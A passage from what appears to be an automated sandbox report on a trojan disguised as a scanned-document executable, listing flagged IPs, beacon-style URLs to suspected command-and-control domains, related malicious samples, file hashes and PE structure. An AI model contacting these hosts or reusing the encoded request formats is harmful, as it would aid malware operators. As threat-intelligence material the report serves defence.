                                      http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmpfalse
                                        high
                                        http://www.jiyu-kobo.co.jp/explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.fontbureau.com/designers8explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmpfalse
                                          high
                                          http://www.fonts.comexplorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmpfalse
                                            high
                                            http://www.sandoll.co.krexplorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://www.urwpp.deDPleaseexplorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://www.zhongyicts.com.cnexplorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://www.sakkal.comexplorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown

                                            Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public

                                            IPDomainCountryFlagASNASN NameMalicious
                                            69.30.217.211
                                            unknownUnited States
                                            32097WIIUStrue
                                            118.27.99.91
                                            unknownJapan7506INTERQGMOInternetIncJPtrue
                                            52.128.23.153
                                            unknownUnited States
                                            19324DOSARRESTUStrue
                                            34.102.136.180
                                            unknownUnited States
                                            15169GOOGLEUStrue
                                            103.29.215.252
                                            unknownIndonesia
                                            58377SENTRACOLO-AS-IDSentraNiagaSolusindoPTIDtrue

                                            General Information

                                            Joe Sandbox Version:31.0.0 Red Diamond
                                            Analysis ID:339379
                                            Start date:13.01.2021
                                            Start time:21:57:15
                                            Joe Sandbox Product:CloudBasic
                                            Overall analysis duration:0h 10m 58s
                                            Hypervisor based Inspection enabled:false
                                            Report type:light
                                            Sample file name:SKM_C36821010708320.exe
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                            Number of analysed new started processes analysed:29
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:1
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • HDC enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Detection:MAL
                                            Classification:mal100.troj.evad.winEXE@7/1@5/5
                                            EGA Information:Failed
                                            HDC Information:
                                            • Successful, ratio: 41.7% (good quality ratio 37.5%)
                                            • Quality average: 74.3%
                                            • Quality standard deviation: 31.5%
                                            HCA Information:
                                            • Successful, ratio: 97%
                                            • Number of executed functions: 0
                                            • Number of non-executed functions: 0
                                            Cookbook Comments:
                                            • Adjust boot time
                                            • Enable AMSI
                                            • Found application associated with file extension: .exe
                                            Warnings:
                                            Show All
                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                            • Excluded IPs from analysis (whitelisted): 13.88.21.125, 104.43.193.48, 52.255.188.83, 23.210.248.85, 51.104.139.180, 92.122.213.247, 92.122.213.194, 8.248.135.254, 67.26.73.254, 67.27.158.254, 67.26.75.254, 67.27.233.254, 51.103.5.186, 20.54.26.129, 52.155.217.156
                                            • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, wns.notify.windows.com.akadns.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, par02p.wns.notify.windows.com.akadns.net, emea1.notify.windows.com.akadns.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, auto.au.download.windowsupdate.com.c.footprint.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net
                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                            Simulations

                                            Behavior and APIs

                                            TimeTypeDescription
                                            21:58:15API Interceptor1x Sleep call for process: SKM_C36821010708320.exe modified

                                            Joe Sandbox View / Context

                                            IPs

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            118.27.99.91DEBIT NOTE_INA101970.exeGet hashmaliciousBrowse
                                            • www.o-tanemaki.com/6bu2/?BZ=UiUikuUm5Gnwa/RC8HfxmFUojYQ87eGtpmlzeqcBYMLKQcnADeoLPEL+PxR+03K2K8UU&o8rLu=yVMpLRLxgxDtgBb
                                            52.128.23.153zz4osC4FRa.exeGet hashmaliciousBrowse
                                            • www.stafffully.com/oean/?1ba0AP=+9WAEfQCyp5HxQcyiadjC39SRpvqs9f27bBIUWE+OUMQn3TFA0re/tfQDqX9OJ3Ulha0&uHrt=FdiDzjvx
                                            btVnDhh5K7.exeGet hashmaliciousBrowse
                                            • www.stafffully.com/oean/?Tj=YvFHu&wxl=+9WAEfQCyp5HxQcyiadjC39SRpvqs9f27bBIUWE+OUMQn3TFA0re/tfQDqX9OJ3Ulha0
                                            4wCFJMHdEJ.exeGet hashmaliciousBrowse
                                            • www.stafffully.com/oean/?lTB=+9WAEfQCyp5HxQcyiadjC39SRpvqs9f27bBIUWE+OUMQn3TFA0re/tfQDp3tBons7Ezz&Bvg=yL0LRZtXKrL
                                            rtgs_pdf.exeGet hashmaliciousBrowse
                                            • www.globalefactory.com/s9zh/?mL08q=cfAP3dhEcu1Vi8J1aoBKUOXri8rpYHK2f4rCuERqPTnzLwFEaC7qLWEHuHs6kiCStM5V&9rn=DhodLVupGVRTP
                                            2021 Additional Agreement.exeGet hashmaliciousBrowse
                                            • www.wellnesssensation.com/bw82/?NjNl72=455EGVYP5nwn6UKaNruX/4AMFbR5eugGoFi+RSiFi9xq+Sc4S/7LJuL4z8vohabTLMb1R2mnPA==&Yn=fbdDwrOx0RedB
                                            wDMBDrN663.exeGet hashmaliciousBrowse
                                            • www.wellnesssensation.com/bw82/?QBZpld=455EGVYP5nwn6UKaNruX/4AMFbR5eugGoFi+RSiFi9xq+Sc4S/7LJuL4z/Dr9qXrGtmj&LL3=aR-TJ4RpiN
                                            PO#14379 - SO#146001119375 XMAS wood land.exeGet hashmaliciousBrowse
                                            • www.walletworx.com/mld/?FDHTHvH=eXz609adlpJgM+GbjcD49qD6NuRM1Sqq0a1i11kc58HUWwC96w5klz7MgxI7dI4ORXBk&Rn=Vra0c
                                            KYC - 17DEC.xlsxGet hashmaliciousBrowse
                                            • www.wellnesssensation.com/bw82/?_nD83tU=455EGVYK5gwj6EGWPruX/4AMFbR5eugGoF6uNR+Emdxr+jw+VvqHfqz6wavXmKjYJszTIA==&bxop=FZm0mHgP8T4l1pi
                                            NEW ORDER 15DEC.xlsxGet hashmaliciousBrowse
                                            • www.wellnesssensation.com/bw82/?ong0rTC=455EGVYK5gwj6EGWPruX/4AMFbR5eugGoF6uNR+Emdxr+jw+VvqHfqz6wavXmKjYJszTIA==&PFQL=nHI4EV
                                            uM87pWnV44.exeGet hashmaliciousBrowse
                                            • www.wellnesssensation.com/bw82/?X0DxCzkX=455EGVYP5nwn6UKaNruX/4AMFbR5eugGoFi+RSiFi9xq+Sc4S/7LJuL4z/DBianrCvuj&Ezr=TXFPhh7XVjsl
                                            Xqgvj3afT1.exeGet hashmaliciousBrowse
                                            • www.wellnesssensation.com/bw82/?rDKtm=455EGVYP5nwn6UKaNruX/4AMFbR5eugGoFi+RSiFi9xq+Sc4S/7LJuL4z8vR+r7QFaHyR2mgcw==&Wr=LhnHMLjP3
                                            DHL DOCS..exeGet hashmaliciousBrowse
                                            • www.indicatormarket.com/lsa/?D8e0g=FZRHs8YHZx&qR-tF=j6zcMESwh65v8ItLpDSh7iy3rRw9k52JvPvDuH2wN+kL1koWHBySfCEZXquezIXX7Pof
                                            at3nJkOFqF.exeGet hashmaliciousBrowse
                                            • www.wellnesssensation.com/bw82/?-Zlpi6B=455EGVYP5nwn6UKaNruX/4AMFbR5eugGoFi+RSiFi9xq+Sc4S/7LJuL4z/Dr9qXrGtmj&2d=onxdA
                                            http://prayersontheweb.comGet hashmaliciousBrowse
                                            • prayersontheweb.com/favicon.ico
                                            34.102.136.180JdtN8nIcLi8RQOi.exeGet hashmaliciousBrowse
                                            • www.cmoorestudio.com/ur06/?w0G=ndiTFPcHXxkLG&jL30vv=31XH+/ZkH6XWvzYOvP3dx+IltFKBIJcLA5RIt4d/klJVe3zOK/eQlkY/FHXkQqvnuoQd
                                            20210113432.exeGet hashmaliciousBrowse
                                            • www.exoticorganicwine.com/dkk/?EvI=Pne6zO+Z3a60Au06FHOmVrHS7z/OeLQppxmg+doCWmhHZjdmG5KKLECfP4ZcwEOpNG8I7WvO0Q==&J49Tz=eln47v8hVLB
                                            Inv.exeGet hashmaliciousBrowse
                                            • www.nationshiphop.com/hko6/?k2JxoV=oEk1uwcTzyLRlLIEQvULAWzRIM6BrJQxm2nmuYWQkJ+zIoa1KldNyrAb+1j5GiVi4vc4&OHiLR=jJBpdVbhUrMh9TJP
                                            74852.exeGet hashmaliciousBrowse
                                            • www.wingateofhouston.com/nf3n/?P6A=bFr0arjPDc1B3fljAhhQU4NpKn/qi+N2lxsYOk/PDiFBsnuAdXLBpwrG8B0Izk+nd97PpVoHHg==&-ZS=W6O4IjSXA
                                            orden pdf.exeGet hashmaliciousBrowse
                                            • www.unbelievabowboutique.com/n7ak/?rN=+VkjiNhUsWsopaF1OEtkI3uXqkAxa5zmKZmZM9Ocj2MgGwUlx9I3FiG4Gn++IiogSOWw&QZ3=dhrxPpcXO0TLHVR
                                            J0OmHIagw8.exeGet hashmaliciousBrowse
                                            • www.epicmassiveconcepts.com/csv8/?t8o8sPp=iJ9LMG7MliwQjz4N9h8Hq4mQMyMQ8EbCXmiUEypb7zSuax6avA4zdFyQt2cMJ86uh/oE&jBZd=KnhT
                                            zHgm9k7WYU.exeGet hashmaliciousBrowse
                                            • www.ricardoinman.com/xle/?0V3lvN=YvRXzPexWxVddR&uXrpEpT=43tORsMo6Gry83Td78nIWgxEplzIHXHZqBl7iQpQA31ZPQcRtwVYWDcsKQZGhQx+cBJl
                                            JAAkR51fQY.exeGet hashmaliciousBrowse
                                            • www.epicmassiveconcepts.com/csv8/?EZUXxJ=iJ9LMG7MliwQjz4N9h8Hq4mQMyMQ8EbCXmiUEypb7zSuax6avA4zdFyQt2cMJ86uh/oE&DzrLH=VBZHYDrxndGXyf
                                            65BV6gbGFl.exeGet hashmaliciousBrowse
                                            • www.outlawgospelshow.com/kgw/?D81dO=3dsCTSsKJfcfLyYHdfjcimIAevlOxP45YAOPNmiGb3RckDOY5KdZ2EMbApwY76ndqYux&tTrL=Fpgl
                                            YvGnm93rap.exeGet hashmaliciousBrowse
                                            • www.crafteest.com/8rg4/?GXITC=UZP/0BHyEu1M6xcQwfN1oLvS1pOV65j2qrbsgROtnkuQKUAN6nqHjVn7Ph/tqme/ujGF&Jt7=XPy4nFjH
                                            Order_00009.xlsxGet hashmaliciousBrowse
                                            • www.brainandbodystrengthcoach.com/csv8/?1bwhC=4rzgp1jcc8l4Wxs4KztLQnvubqNqMY/2ozhXYXCY6yGJDbul1z8E6+SozVJniMc1Iz21RA==&tB=TtdpPpwhOlt
                                            13-01-21.xlsxGet hashmaliciousBrowse
                                            • www.kolamart.com/bw82/?x2J8=U5qlNe3qvCiRDMVNZAk3bGcrOcPwpu2hHSyAkQWR0ho6UxGTq/9WR3TB3nENm+o2HqQ7BQ==&Ab=gXuD_lh8bfV4RN
                                            NEW 01 13 2021.xlsxGet hashmaliciousBrowse
                                            • www.gdsjgf.com/bw82/?UL0xqd7P=7KG5rMnMQSi+1zMSyyvwq06b8xrmRTVdiDQe9ch18oMrwrVTJ7b27nrbU/HrWldfz0eoHA==&CXi4A=gXrXRfH0yDoHcf-
                                            PO85937758859777.xlsxGet hashmaliciousBrowse
                                            • www.bodyfuelrtd.com/8rg4/?RJ=A4ItsHP7WirPGvorxE1FqdRUH2iuHEJ7Bx0GuGGPjza4UX3M9OXu5uVQhTJ1ITDXtosJtw==&LFQHH=_pgx3Rd
                                            Order_385647584.xlsxGet hashmaliciousBrowse
                                            • www.oohdough.com/csv8/?NP=oR+kRp92OlWNPHb8tFeSfFFusuQV5SLrlvHcvTTApHN9lxDZF+KzMj/NshbaIk6/gJtwpQ==&nN6l9T=K0GdGdPX7JyL
                                            PO#218740.exeGet hashmaliciousBrowse
                                            • www.epochryphal.com/wpsb/?Wxo=n7b+ISrk/mPyWzbboTpvP41tNOKzDU5etPpa3uuDPgrT9THM2mbO6pyh4trMr+rUEpul&vB=lhv8
                                            20210111 Virginie.exeGet hashmaliciousBrowse
                                            • www.mrkabaadiwala.com/ehxh/?Gzux=8Ka3Lv4ePZYbHHrfWWyIjg6yKJpjzOn7QTDTNOD0A86ZD78kMrm+GgFnyvrieFQhDFXfm2RQfw==&AnB=O0DToLD8K
                                            20210113155320.exeGet hashmaliciousBrowse
                                            • www.ortigiarealty.com/dkk/?BZ=59qCdC3RMUvEyWKLbbpm6Z+GlV/JTwbDjS9GwZYTXRwVfK7Z9ENGl/302ncjjG4TtqPC&I6A=4hOhA0
                                            13012021.exeGet hashmaliciousBrowse
                                            • www.sydiifinancial.com/rbg/?-ZV4gjY=zsOc27F1WxfzCuYGlMZHORhUu2hDO+A8T5/oUCY+tOSiKp0YV+JX8kcBbP6nsiP5HbIi&-ZSl=1bgPBf
                                            Po-covid19 2372#w2..exeGet hashmaliciousBrowse
                                            • www.thesaltlifestyle.com/p95n/?u6ihA=cjlpdRL8ZtfDvB1&oH5h=BBaWJPlPEO+nvtMqhmqrcRgDtKq1LKrnuc6I0tDI+4mn5icveD46W7DXUUudv5GhOCct

                                            Domains

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            www.o-tanemaki.comDEBIT NOTE_INA101970.exeGet hashmaliciousBrowse
                                            • 118.27.99.91

                                            ASN

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            WIIUS099898892.exeGet hashmaliciousBrowse
                                            • 173.208.235.235
                                            SOA121520.exeGet hashmaliciousBrowse
                                            • 69.197.175.2
                                            PaymentAdvice.htmlGet hashmaliciousBrowse
                                            • 204.12.221.197
                                            IMG09122020.exeGet hashmaliciousBrowse
                                            • 69.197.175.2
                                            dB7XQuemMc.exeGet hashmaliciousBrowse
                                            • 173.208.235.235
                                            https://wolusozai.web.app/yuniri-%E9%AB%98%E9%BD%A2%E8%80%85-%E7%84%A1%E6%96%99%E3%82%A4%E3%83%A9%E3%82%B9%E3%83%88.htmlGet hashmaliciousBrowse
                                            • 173.208.139.133
                                            Se adjunta un nuevo pedido.exeGet hashmaliciousBrowse
                                            • 173.208.235.235
                                            138.exeGet hashmaliciousBrowse
                                            • 69.30.232.138
                                            Quotation.exeGet hashmaliciousBrowse
                                            • 204.12.231.12
                                            yEgeRoEgBk.exeGet hashmaliciousBrowse
                                            • 69.30.203.214
                                            http://o4a.me/EGmJpGet hashmaliciousBrowse
                                            • 173.208.207.238
                                            Complaint_Letter_786544411_09072020.docGet hashmaliciousBrowse
                                            • 173.208.239.119
                                            2svozs0lnii.exeGet hashmaliciousBrowse
                                            • 173.208.141.106
                                            HPFBbOXwo3.exeGet hashmaliciousBrowse
                                            • 69.30.203.214
                                            _064752.exeGet hashmaliciousBrowse
                                            • 69.30.203.214
                                            _064751.exeGet hashmaliciousBrowse
                                            • 69.30.203.214
                                            _001733.exeGet hashmaliciousBrowse
                                            • 69.30.203.214
                                            _001734.exeGet hashmaliciousBrowse
                                            • 69.30.203.214
                                            _001735.exeGet hashmaliciousBrowse
                                            • 69.30.203.214
                                            _001734.exeGet hashmaliciousBrowse
                                            • 69.30.203.214
                                            DOSARRESTUSzz4osC4FRa.exeGet hashmaliciousBrowse
                                            • 52.128.23.153
                                            btVnDhh5K7.exeGet hashmaliciousBrowse
                                            • 52.128.23.153
                                            4wCFJMHdEJ.exeGet hashmaliciousBrowse
                                            • 52.128.23.153
                                            Inquiry-RFQ93847849-pdf.exeGet hashmaliciousBrowse
                                            • 52.128.23.218
                                            rtgs_pdf.exeGet hashmaliciousBrowse
                                            • 52.128.23.153
                                            SecuriteInfo.com.Variant.Razy.820883.21352.exeGet hashmaliciousBrowse
                                            • 52.128.23.218
                                            New Purchase Order NoI-701-PDF.exeGet hashmaliciousBrowse
                                            • 52.128.23.218
                                            2021 Additional Agreement.exeGet hashmaliciousBrowse
                                            • 52.128.23.153
                                            wDMBDrN663.exeGet hashmaliciousBrowse
                                            • 52.128.23.153
                                            PO#14379 - SO#146001119375 XMAS wood land.exeGet hashmaliciousBrowse
                                            • 52.128.23.153
                                            KYC - 17DEC.xlsxGet hashmaliciousBrowse
                                            • 52.128.23.153
                                            NEW ORDER 15DEC.xlsxGet hashmaliciousBrowse
                                            • 52.128.23.153
                                            uM87pWnV44.exeGet hashmaliciousBrowse
                                            • 52.128.23.153
                                            Xqgvj3afT1.exeGet hashmaliciousBrowse
                                            • 52.128.23.153
                                            DHL DOCS..exeGet hashmaliciousBrowse
                                            • 52.128.23.153
                                            at3nJkOFqF.exeGet hashmaliciousBrowse
                                            • 52.128.23.153
                                            6rR1G3EcvT3djII.exeGet hashmaliciousBrowse
                                            • 52.128.23.218
                                            http://prayersontheweb.comGet hashmaliciousBrowse
                                            • 52.128.23.153
                                            Inv.exeGet hashmaliciousBrowse
                                            • 69.172.201.218
                                            qAOaubZNjB.exeGet hashmaliciousBrowse
                                            • 69.172.201.153
                                            INTERQGMOInternetIncJPsample20210113-01.xlsmGet hashmaliciousBrowse
                                            • 157.7.166.26
                                            20210113155320.exeGet hashmaliciousBrowse
                                            • 157.7.44.233
                                            AOA4sx8Z7l.exeGet hashmaliciousBrowse
                                            • 157.7.107.201
                                            invoice.xlsxGet hashmaliciousBrowse
                                            • 118.27.99.24
                                            2021 NEW PURCHASE REQUIREMENT.xlsxGet hashmaliciousBrowse
                                            • 163.44.185.233
                                            2021 NEW PURCHASE REQUIREMENT .xlsxGet hashmaliciousBrowse
                                            • 163.44.185.233
                                            Q52msELKeI.exeGet hashmaliciousBrowse
                                            • 163.44.185.216
                                            099898892.exeGet hashmaliciousBrowse
                                            • 163.44.239.73
                                            NEW PURCHASE REQUIREMENT .xlsxGet hashmaliciousBrowse
                                            • 163.44.185.199
                                            FTH2004-005.exeGet hashmaliciousBrowse
                                            • 150.95.254.16
                                            PO21010699XYJ.exeGet hashmaliciousBrowse
                                            • 118.27.99.22
                                            W08347.exeGet hashmaliciousBrowse
                                            • 163.44.239.73
                                            Nuevo pedido.exeGet hashmaliciousBrowse
                                            • 150.95.255.38
                                            rib.exeGet hashmaliciousBrowse
                                            • 150.95.54.151
                                            DEBIT NOTE_INA101970.exeGet hashmaliciousBrowse
                                            • 118.27.99.91
                                            2019-2020_SOA_Payment_31 Dec2020.xlsxGet hashmaliciousBrowse
                                            • 163.44.185.233
                                            990109.exeGet hashmaliciousBrowse
                                            • 210.172.144.245
                                            2019-2020_SOA_Payment_22Dec2020.xlsxGet hashmaliciousBrowse
                                            • 163.44.185.233
                                            List items.exeGet hashmaliciousBrowse
                                            • 163.44.185.223
                                            2019-2020_SOA_Payment_21Dec2020.xlsxGet hashmaliciousBrowse
                                            • 163.44.185.233

                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SKM_C36821010708320.exe.log
                                            Process:C:\Users\user\Desktop\SKM_C36821010708320.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):1216
                                            Entropy (8bit):5.355304211458859
                                            Encrypted:false
                                            SSDEEP:24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
                                            MD5:69206D3AF7D6EFD08F4B4726998856D3
                                            SHA1:E778D4BF781F7712163CF5E2F5E7C15953E484CF
                                            SHA-256:A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
                                            SHA-512:CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
                                            Malicious:true
                                            Reputation:moderate, very likely benign file
                                            Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                            Static File Info

                                            General

                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Entropy (8bit):7.220259879490445
                                            TrID:
                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                            • Win32 Executable (generic) a (10002005/4) 49.75%
                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                            • Windows Screen Saver (13104/52) 0.07%
                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                            File name:SKM_C36821010708320.exe
                                            File size:784896
                                            MD5:15d8096422d137c7388908bb2be61ec4
                                            SHA1:e67d261ef38eb251fb97a466d83c95e75d286ebe
                                            SHA256:fae57c2f185899220dff608004ab571822fc14cc02aa7e30b1cd5db7be4beea8
                                            SHA512:83d38e2e5540d1a2790f834e62bd1cc6978eae92c6d70ca875b72e0d33852473b68b36b99c4fe05e3c100283dee6353e45f907eecbb9369d730c17c5c20bb1f5
                                            SSDEEP:6144:SJE48vE+80jGdr3lL//L1g++DML8Rv+vOf4ikNOt/0CL5Glvd99j0ah2/a0XJtbq:SJRDpTr1rAbdN+l0hY/jDi6yx7FBq9
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......_..............P.................. ... ....@.. .......................`............@................................

                                            File Icon

                                            Icon Hash:00828e8e8686b000

                                            Static PE Info

                                            General

                                            Entrypoint:0x4c0d8a
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                            DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                            Time Stamp:0x5FFEBDF3 [Wed Jan 13 09:31:31 2021 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:v4.0.30319
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                            Entrypoint Preview

                                            Instruction
                                            jmp dword ptr [00402000h]
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al

                                            Data Directories

                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xc0d380x4f.text
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xc20000x60c.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xc40000xc.reloc
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                            Sections

                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x20000xbed900xbee00False0.674781024885data7.22890252229IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
